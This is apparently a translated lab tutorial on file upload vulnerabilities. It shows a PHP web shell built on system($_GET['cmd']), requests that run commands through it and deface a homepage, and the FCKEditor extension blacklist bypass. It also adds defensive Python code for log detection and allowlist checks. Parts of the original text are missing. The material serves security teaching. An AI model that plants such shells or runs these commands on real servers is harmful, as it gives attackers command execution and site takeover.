File upload vulnerability instance analysis

Source: Internet
Author: User
Principles of file upload vulnerability instance analysis

File upload is a common feature in Web applications: it lets users upload files to the server, which saves them to a specific location. From a security standpoint this is a very sensitive function. Once a malicious program is uploaded to the server and gains execution permission, the consequences are severe. Therefore, most Web applications place many restrictions on the file upload function. A file upload vulnerability lets an attacker bypass the system's file verification and processing policies by exploiting program defects, upload a malicious program to the server, and obtain the ability to execute commands on it. This attack method is direct and effective, and against some fragile systems it requires almost no skill.

Common methods of exploiting a file upload vulnerability include:

1. Uploading a Web script program, which the Web container then interprets and executes.

2. Uploading the Flash cross-domain policy file crossdomain.xml to modify access permissions (other policy files are used in a similar way).

3. Uploading virus or Trojan files and tricking users and administrators into downloading and executing them.

4. Uploading images that contain scripts; some older browser versions execute the script, enabling phishing and fraud.

In general, the uploaded file is either executable (a malicious program) or able to affect server behavior (a configuration file). For an attack to succeed, the following conditions must be met:

The file can pass through the front-end and back-end filtering and processing.

The file content is not changed and is stored correctly.

The storage location is within the control range of the Web container.

The attacker has permission to access the storage directory.

We use an experiment to demonstrate method 1. It uses the following materials:

regist folder (the vulnerable Web application)

hacker.php (the malicious script to be uploaded)

hacked.html (the defacement page that will replace the homepage)

Run the following commands to download the experiment materials into any directory of the VM and decompress them:

wget http://labfile.oss.aliyuncs.com/courses/443/stuffs.tar.gz

tar -xzf stuffs.tar.gz

cd stuffs

1. Deploy the Web application

Copy the regist folder to the /var/www/html/ directory:

sudo cp -R regist /var/www/html/

The regist folder has the following directory structure:

index.html (front-end registration page)

regist.php (back-end registration handler)

upload/ (file upload directory)

css/ (style file directory)

fonts/ (font file directory)

js/ (script file directory)

Modify the directory permissions:

sudo chmod -R 777 /var/www/html/regist

Start the Apache2 service:

sudo service apache2 start

2. Upload malicious scripts

Token)

3. Access the script program

The directory structure shows that uploaded files are stored in the upload/ directory, so you can enter http://localhost/regist/upload/hacker.php in the address bar of your browser.

The source code of hacker.php is as follows:

Cmd:

Result:

In fact, you can write any code you like in the script file, as long as it is properly constructed and executes successfully.

The core code is system($_GET['cmd']); it calls the PHP function system() to execute Linux commands, taking the command from the cmd parameter of the GET request. This means that any Linux command can be executed with the permissions of the current user, just as on a local computer. First, test whether the malicious program runs normally:

http://localhost/regist/upload/hacker.php?cmd=whoami

Then use it to replace the website homepage:

http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html

Access the Web application at localhost/regist again and refresh the page: the replacement has succeeded and the page displays "You Are Hacked".

Upload hacked.html to the upload/ directory.
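A detection view of the same activity, added here as an example that is not part of the original tutorial: the access-log lines are constructed to mirror the requests above, the upload path comes from the lab's directory structure, and the script-extension list follows the FCKEditor blacklist discussed later. It flags script files requested from the upload/ directory and extracts the cmd value for triage.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

UPLOAD_DIR = "/regist/upload/"   # upload directory from the lab's structure
# Server-side script extensions; the list follows the FCKEditor blacklist in the text.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|inc)$", re.I)


def analyze(line):
    """Return a finding for one access-log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)
    # Only script files requested from inside the upload directory matter here.
    if not path.startswith(UPLOAD_DIR) or not SCRIPT_EXT.search(path):
        return None
    cmd = parse_qs(url.query).get("cmd", [""])[0]   # parse_qs decodes %20 etc.
    # A 200 means the script actually executed; a 404 is still worth a look.
    return {"ip": m["ip"], "time": m["ts"], "path": path, "status": m["status"],
            "cmd": cmd, "severity": "high" if m["status"] == "200" else "medium"}


def scan(lines):
    """Run analyze() over many lines and keep only the findings."""
    return [f for f in map(analyze, lines) if f]


# Constructed log lines mirroring the requests made in the walkthrough above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /regist/ HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "POST /regist/regist.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /regist/upload/hacker.php?cmd=whoami HTTP/1.1" 200 88
10.0.0.5 - - [01/Jan/2024:10:00:41 +0000] "GET /regist/upload/hacker.php?cmd=mv%20hacked.html%20../index.html HTTP/1.1" 200 60
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /regist/upload/avatar.png HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /regist/upload/old.php HTTP/1.1" 404 210
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```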

Thoughts and extensions

1. Type check

In the experiment, the website's front end does not effectively filter or process uploaded files. Well-known vulnerabilities of the same kind include the FCKEditor file upload vulnerability. FCKEditor is a very popular rich text editor, and one PHP version had a file upload type-check vulnerability. The related code is as follows:

$Config['AllowedExtensions']['File'] = array(); // allowed upload types; an empty array means no allowlist is applied

$Config['DeniedExtensions']['File'] = array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl', 'bat', 'exe', 'dll', 'reg', 'cgi'); // upload-prohibited types (blacklist)

As you can see, the code does check the file type, but it uses a blacklist. Therefore a name with an extension such as php2 or inc, which is not on the list, passes the type check. In addition, front-end verification can usually be bypassed by modifying or forging the POST request.
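The blacklist approach beside an allowlist approach, as an added example that is not FCKEditor's or the lab application's own code: the denied list is copied from the configuration above, the allowed set assumes the registration form only needs avatar images, and the sample names are constructed (php2 and inc are the cases named in the text). The allowlist version also lower-cases the name, strips trailing dots and spaces, checks every extension segment, and lets the server choose the stored file name.

```python
import os
import secrets

# Blacklist copied from the FCKEditor configuration discussed above.
FCK_DENIED = {"php", "php3", "php5", "phtml", "asp", "aspx", "ascx", "jsp",
              "cfm", "cfc", "pl", "bat", "exe", "dll", "reg", "cgi"}

# Allowlist of what the registration form needs (assumed: avatar images only).
ALLOWED = {"jpg", "jpeg", "png", "gif"}


def extension_segments(filename):
    """Return every dot-separated suffix of the basename, lower-cased.

    Trailing dots/spaces are stripped and all segments are returned so the
    allowlist can check each of them, not just the last one."""
    base = os.path.basename(filename.replace("\\", "/")).strip().rstrip(". ")
    parts = base.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def blacklist_check(filename):
    """The FCKEditor approach: accept unless the last extension is denied."""
    segs = extension_segments(filename)
    return bool(segs) and segs[-1] not in FCK_DENIED


def allowlist_check(filename):
    """Hardened approach: every extension segment must be on the allowlist."""
    segs = extension_segments(filename)
    return bool(segs) and all(s in ALLOWED for s in segs)


def stored_name(filename):
    """Server-chosen storage name: random token plus the validated extension,
    so the user-supplied name never reaches the filesystem."""
    if not allowlist_check(filename):
        raise ValueError("rejected upload: %r" % filename)
    return secrets.token_hex(16) + "." + extension_segments(filename)[-1]


# Constructed sample names; php2 and inc are the bypass cases named in the text.
SAMPLES = ["hacker.php2", "hacker.inc", "hacker.php", "avatar.png", "photo.jpeg"]


def compare(names=SAMPLES):
    """Map each name to (blacklist verdict, allowlist verdict)."""
    return {n: (blacklist_check(n), allowlist_check(n)) for n in names}
```

Running compare() shows the two names the text mentions slipping past the blacklist while the allowlist rejects them.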

2. Permission requirements

To achieve the attack effect, the experiment steps simplify some complex details. Some key steps involve operation permissions; the permissions required for each step are as follows:

Step or operation | Permission requirements
